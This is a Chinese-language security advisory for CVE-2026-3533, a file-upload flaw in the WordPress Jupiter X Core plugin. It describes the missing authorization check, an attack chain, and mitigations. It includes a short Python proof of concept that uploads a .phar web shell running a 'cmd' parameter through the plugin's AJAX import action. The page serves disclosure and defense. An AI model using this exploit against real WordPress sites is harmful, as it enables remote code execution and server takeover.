CVE-2026-3533 CVSS 8.8 高危

CVE-2026-3533: WordPress Jupiter X Core插件文件上传漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3533

漏洞类型

文件上传, 远程代码执行, 存储型XSS

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jupiter X Core Plugin for WordPress

漏洞概述

WordPress Jupiter X Core插件在4.14.1及以下版本中存在严重漏洞。由于`import_popup_templates()`函数缺少授权检查以及`upload_files()`函数文件类型验证不足，导致经过身份验证的攻击者（仅需订阅者权限）即可上传恶意文件。攻击者可利用此漏洞在特定服务器配置下执行远程代码，或上传恶意脚本造成存储型跨站脚本攻击，严重威胁服务器安全。

技术细节

该漏洞的核心在于WordPress Jupiter X Core插件中存在权限校验缺失及文件类型验证不足的双重缺陷。具体而言，`import_popup_templates()`函数未对调用者进行严格的身份权限验证，使得仅拥有订阅者权限的低级别用户也能触发该功能。同时，`upload_files()`函数在处理文件上传时，未能有效识别和拦截危险文件类型。攻击者利用这一漏洞，可以构造包含恶意后门的`.phar`文件或包含JavaScript脚本的`.svg`文件并发送至服务器。在Apache+mod_php等特定服务器配置下，`.phar`文件会被当作PHP代码解析执行，从而导致服务器被完全控制；而`.svg`等文件则会在管理员查看时触发存储型XSS，窃取敏感信息。

攻击链分析

STEP 1

步骤1：获取低权限账号

攻击者在目标WordPress站点注册或获取一个订阅者级别的账户。

STEP 2

步骤2：绕过权限验证

利用`import_popup_templates()`函数缺少授权检查的缺陷，以订阅者身份调用本应受限制的文件上传功能。

STEP 3

步骤3：上传恶意文件

通过`upload_files()`函数上传构造好的`.phar`（用于RCE）或`.svg`（用于XSS）文件，绕过不充分的文件类型验证。

STEP 4

步骤4：触发漏洞利用

访问上传的文件路径。若服务器配置将.phar解析为PHP，则执行恶意代码实现RCE；若为.svg，则诱导管理员查看以触发XSS。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (WordPress AJAX endpoint)
target = "http://example.com/wp-admin/admin-ajax.php"

# Attacker's session cookie (Subscriber level)
cookies = {
    "wordpress_logged_in_xxx": "attacker_cookie_value"
}

# Malicious file payload (e.g., .phar for RCE or .svg for XSS)
# Exploiting the upload_files() function via import_popup_templates()
files = {
    'file': ('malicious.phar', b'<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}

data = {
    'action': 'jupiterx_core_popup_import_template' # Vulnerable action
}

response = requests.post(target, data=data, files=files, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! File uploaded.")
    print("[+] Response:", response.text)
else:
    print("[-] Exploit failed.")

影响范围

Jupiter X Core <= 4.14.1

防御指南

临时缓解措施

建议立即将Jupiter X Core插件更新到最新版本以修补漏洞。如果暂时无法更新，应通过服务器配置（如.htaccess或nginx.conf）禁止在uploads目录执行PHP文件，并考虑暂时禁用该插件的功能模块，直到完成更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表